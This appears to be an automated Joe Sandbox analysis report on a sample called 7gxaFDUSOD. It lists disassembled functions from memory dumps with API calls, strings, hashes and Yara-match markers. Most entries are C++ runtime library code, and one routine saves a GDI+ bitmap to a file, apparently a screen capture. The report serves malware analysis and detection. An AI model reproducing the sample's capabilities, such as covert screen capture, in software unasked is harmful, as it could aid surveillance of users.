Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction ID: 1aa241efc112286da59c73bb00310cdec327cb4216d8ea75c5d160ea2c1741d7
Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction Fuzzy Hash: 5311E0B2C002289BCB11EBA0C801AEE7774AF44318F10053FE911BB2D1CB389E058B98

Function 0247C3F0 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0247C401
int.LIBCPMT ref: 0247C418

Part of subcall function 0247BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0247BFD4
Part of subcall function 0247BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0247BFEE

std::locale::_Getfacet.LIBCPMT ref: 0247C421
std::_Facet_Register.LIBCPMT ref: 0247C452
std::_Lockit::~_Lockit.LIBCPMT ref: 0247C468
__CxxThrowException@8.LIBVCRUNTIME ref: 0247C486

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction ID: 7fde380ba2433709925aa48cbce426dcd8f5b3fb0bad4bf98aea0e4913c3a21a
Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction Fuzzy Hash: 5811A1719002289BCF15FBA5D884AEE7B76AF45714F14052FE821BB290DF749A05CFA4

Function 02474E7B Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 02474E8C
int.LIBCPMT ref: 02474EA3

Part of subcall function 0247BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0247BFD4
Part of subcall function 0247BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0247BFEE

std::locale::_Getfacet.LIBCPMT ref: 02474EAC
std::_Facet_Register.LIBCPMT ref: 02474EDD
std::_Lockit::~_Lockit.LIBCPMT ref: 02474EF3
__CxxThrowException@8.LIBVCRUNTIME ref: 02474F11

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction ID: 5cec8dc9ef8baebea86ba37eeaa29eb09289fa26feddf74ed473df9f2c5ccc89
Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction Fuzzy Hash: 4A11A131D00229DBCF15EBA5D844AEE77B6AF44724F14051FE421BB2A0DF749A05CFA5

Function 00404E63 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00404E6A

Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E

std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EB5
__Getcoll.LIBCPMT ref: 00404EC4
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ED4

Strings

fJ@, xrefs: 00404EBE

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID: fJ@
API String ID: 1836011271-3478227103
Opcode ID: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
Instruction ID: b09a35a98a06b47a9133a0f6fd6c3c5fe655fd81b24a3011873ef7005f6a19eb
Opcode Fuzzy Hash: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
Instruction Fuzzy Hash: 160157719002089FDB00EFA5C481B9EB7B0BF80318F10857EE045AB6C1CB789A84CB99

Function 0042FEE4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002), ref: 0042FF04
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF17
FreeLibrary.KERNEL32(00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000), ref: 0042FF3A

Strings

CorExitProcess, xrefs: 0042FF0F
mscoree.dll, xrefs: 0042FEFD

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
Instruction ID: 2c645cf7ccd09daad3cc37133732e5cb7e12e7ad02a2fd82027b287817b89b2c
Opcode Fuzzy Hash: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
Instruction Fuzzy Hash: 00F0C830A10218BBDB109F90DD09B9EFFB4EF05B12F5100B6F805A2290CB799E44CB9C

Function 0041CE0D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE21
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE45
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE58
__CxxThrowException@8.LIBVCRUNTIME ref: 0041CE66

Strings

pScheduler, xrefs: 0041CE50

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 3657713681-923244539
Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction ID: 55b545704ffbdb88c77e4cd2f194ab5b8344582a808f7ff6d102e262485e3fbf
Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction Fuzzy Hash: 7FF05935940714A7C714EA05DC82CDEB3799E90B18760822FE40963282DF3CA98AC29D

Function 024B08F1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 024B08F8
make_shared.LIBCPMT ref: 024B0943

Strings

RCC, xrefs: 024B092A
MOC, xrefs: 024B091B
v)D, xrefs: 024B08F3

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchmake_shared
String ID: MOC$RCC$v)D
API String ID: 3472968176-3108830043
Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction ID: bfd7818decd64fa599f9f57c8d04e82935a596c9ca942e64c5762841d71a1ba5
Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction Fuzzy Hash: A0F03CB1A00514DFDB16FBA5C4006AE3B65AF15B05B469097E4445B260CB785988CFA1

Function 0042B106 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
Instruction ID: bf4f81b698e6ff7fb3fc7778d7bd366b6aaf8ee244f588ee8458200c33ffab4c
Opcode Fuzzy Hash: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
Instruction Fuzzy Hash: E7719D31A00366DBCB21CF95E884ABFBB75FF45360F98426AE81097290D7789D41C7E9

Function 0249B36D Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
Instruction ID: 638c6d89fbce057c4e3dd2c61558b9519687e7f3e0227f2698054f98d66f9aea
Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
Instruction Fuzzy Hash: AD71AF71900216DBDF21CF99E884ABFBFB6EF4572CF54422BE41157290DB708982CBA1

Function 00430A44 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

_free.LIBCMT ref: 00430B4F
_free.LIBCMT ref: 00430B66
_free.LIBCMT ref: 00430B85
_free.LIBCMT ref: 00430BA0
_free.LIBCMT ref: 00430BB7

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
Instruction ID: f55d0931b52299485a7a2c2bc17b7062c97d80267fd2ec389340ea5f3bc65001
Opcode Fuzzy Hash: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
Instruction Fuzzy Hash: 1B51E171A00304AFEB21AF69D851B6BB7F5EF5C724F14166EE809D7250E739E9018B88

Function 024A0CAB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024A390E: RtlAllocateHeap.NTDLL(00000000,0247DAD7,00000000), ref: 024A3940

_free.LIBCMT ref: 024A0DB6
_free.LIBCMT ref: 024A0DCD
_free.LIBCMT ref: 024A0DEC
_free.LIBCMT ref: 024A0E07
_free.LIBCMT ref: 024A0E1E

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
Instruction ID: f82ca20b189b8137b97b4a785df3662bd38b35e9413d5145dfb4eb3d9334e506
Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
Instruction Fuzzy Hash: D5519032A00704AFDB21DF6AD891B6BB7F5EF69724B14156EE809DB250E731E901CB80

Function 004314DB Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043154D
_free.LIBCMT ref: 0043156D

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction ID: a8a3d8b7f400355b52e94c2f1cdfa5b65e8520eb193c97cf831389b305dd6f12
Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction Fuzzy Hash: C641C332A00204AFCB10DF79C981A5EB7F5EF89718F25456AE616EB391DB35ED01CB84

Function 024A1742 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 024A17B4
_free.LIBCMT ref: 024A17D4

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction ID: dc67612cb229e640dd9053dbefcd7cb2562cfebe55b7af3f5626d21d4c3eda05
Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction Fuzzy Hash: 4C41DF36A002049FCB20DF79C990AAEB7E6EF98714F1545AED919EB381D731E901CB80

Function 0043689D Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0FA,00000000,00000000,0042D938,?,0042D938,?,00000001,0042D0FA,23E85006,00000001,0042D938,0042D938), ref: 004368EA
__alloca_probe_16.LIBCMT ref: 00436922
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436973
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436985
__freea.LIBCMT ref: 0043698E

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
Instruction ID: 7e388e7d71fb0b77ac45b15fa9433514929e8a136d1dde51ddb927b45f4c022b
Opcode Fuzzy Hash: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
Instruction Fuzzy Hash: AF310372A1020AABDF259F65CC41EAF7BA5EF48710F15422AFC04D7250E739CD54CB94

Function 0041AEC6 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0041AEEB

Part of subcall function 00410F21: _SpinWait.LIBCONCRT ref: 00410F39

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEFF
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF31
List.LIBCMT ref: 0041AFB4
List.LIBCMT ref: 0041AFC3

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
Instruction ID: 46db479fd15f51553f338c6c2feaa856f28efda07e700d063999dccf6460c254
Opcode Fuzzy Hash: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
Instruction Fuzzy Hash: 32316A71902755DFCB14EFA5D5415EEB7B1BF04308F04406FE40167242DB7869A6CB9A

Function 0248B12D Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0248B152

Part of subcall function 02481188: _SpinWait.LIBCONCRT ref: 024811A0

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0248B166
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0248B198
List.LIBCMT ref: 0248B21B
List.LIBCMT ref: 0248B22A

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
Instruction ID: aabba020d17ecca51ada248c89119aed95fc0fc51d4dfc2164fee1eb17813de1
Opcode Fuzzy Hash: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
Instruction Fuzzy Hash: 3A315232A20616DFCB16FFA4C9906EEBBB2FF05348B04406FC805BB641CB716909CB91

Function 00402038 Relevance: 7.6, APIs: 5, Instructions: 80memoryfilewindowCOMMON

Download Yara Rule

APIs

GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040206A
GdipAlloc.GDIPLUS(00000010), ref: 00402072
GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040208D
GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020B7
GdiplusShutdown.GDIPLUS(?), ref: 004020E3

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
String ID:
API String ID: 2357751836-0
Opcode ID: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
Instruction ID: 6785f0869033a78d9e1d3ccf4ec12d3ecd4d06d6a9d1a5793ffee6b17630f5bc
Opcode Fuzzy Hash: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
Instruction Fuzzy Hash: 522151B5A0131AAFCB00DF65DD499AFBBB9FF49741B104436E902F3290D7759901CBA8

Function 024750C6 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo.LIBCPMT ref: 024750A3
std::_Locinfo::~_Locinfo.LIBCPMT ref: 024750B7
std::_Locinfo::_Locinfo.LIBCPMT ref: 0247511C
__Getcoll.LIBCPMT ref: 0247512B
std::_Locinfo::~_Locinfo.LIBCPMT ref: 0247513B

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: Locinfostd::_$Locinfo::_Locinfo::~_$Getcoll
String ID:
API String ID: 2395760641-0
Opcode ID: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
Instruction ID: 395c1ffbd8be14887cdae244d72618791d151c1109a24223cde4737e02e7dbb4
Opcode Fuzzy Hash: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
Instruction Fuzzy Hash: AC2198B2814208AFDB11EFA5C484BDDBBB1FF50716F50845FE4A5AB280DBB49948CF91

Function 00431F5E Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
_free.LIBCMT ref: 00431F98
_free.LIBCMT ref: 00431FBF
SetLastError.KERNEL32(00000000), ref: 00431FCC
SetLastError.KERNEL32(00000000), ref: 00431FD5

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
Instruction ID: 0958b0acb89a9b0c851ef96239832ae32a3192186555c964954bc496c6487c7c
Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
Instruction Fuzzy Hash: EA01F936249A007BD7122B266C45D2B262DEBD977AF21212FF804933F2EF6C8D02412D

Function 024A21C5 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(0247DAD7,0247DAD7,00000002,0249ED35,024A3951,00000000,?,02496A05,00000002,00000000,00000000,00000000,?,0247CF88,0247DAD7,00000004), ref: 024A21CA
_free.LIBCMT ref: 024A21FF
_free.LIBCMT ref: 024A2226
SetLastError.KERNEL32(00000000,?,0247DAD7), ref: 024A2233
SetLastError.KERNEL32(00000000,?,0247DAD7), ref: 024A223C

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
Instruction ID: 3f866474c3a6331fbe90defd2663998d42fcd66c8cb0b230a2ee07bafb44e7a1
Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
Instruction Fuzzy Hash: 1501F937245B003B9316AB355C64E6B262EABF1B72B10013FFC15963D1EFF088069529

Function 00431EDA Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
_free.LIBCMT ref: 00431F11
_free.LIBCMT ref: 00431F39
SetLastError.KERNEL32(00000000), ref: 00431F46
SetLastError.KERNEL32(00000000), ref: 00431F52

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
Instruction ID: 3b026b3c5eee41f9d7def55204e2a076619a9c86630fc827cc9980c008d650a8
Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
Instruction Fuzzy Hash: 6BF02D3A608A0077D61637356C06B1B26199FC9B26F31112FF815933F2EF2DC902452D

Function 024A2141 Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
_free.LIBCMT ref: 024A2178
_free.LIBCMT ref: 024A21A0
SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21AD
SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
Instruction ID: 530fb421b4aeea4bdd977ac753655353c8eb359f940b8d7925027ee7f25cb720
Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
Instruction Fuzzy Hash: DCF0A935544A003BD617A735AC29B1F262A9FF2F62F15012FFD1992390EFE185029529

Function 00417920 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041273D: TlsGetValue.KERNEL32(?,?,00410B5B,00412C68,00000000,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412743

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041794A

Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FDA
Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FF3
Part of subcall function 00420FB3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421069
Part of subcall function 00420FB3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421071

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417958
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417962
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041796C
__CxxThrowException@8.LIBVCRUNTIME ref: 0041798A

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
String ID:
API String ID: 4266703842-0
Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction ID: 523e498e96a622df23a613ee45563367b5d22c9a8c27bf88e83bdf0efd96127b
Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction Fuzzy Hash: B0F04C31A0021427CE15B7269912AEEB7269F80724B40012FF40183382DF6C9E9987CD

Function 02487B87 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024829A4: TlsGetValue.KERNEL32(?,?,02480DC2,02482ECF,00000000,?,02480DA0,?,?,?,00000000,?,00000000), ref: 024829AA

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 02487BB1

Part of subcall function 0249121A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 02491241
Part of subcall function 0249121A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0249125A
Part of subcall function 0249121A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 024912D0
Part of subcall function 0249121A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 024912D8

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 02487BBF
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 02487BC9
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 02487BD3
__CxxThrowException@8.LIBVCRUNTIME ref: 02487BF1

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
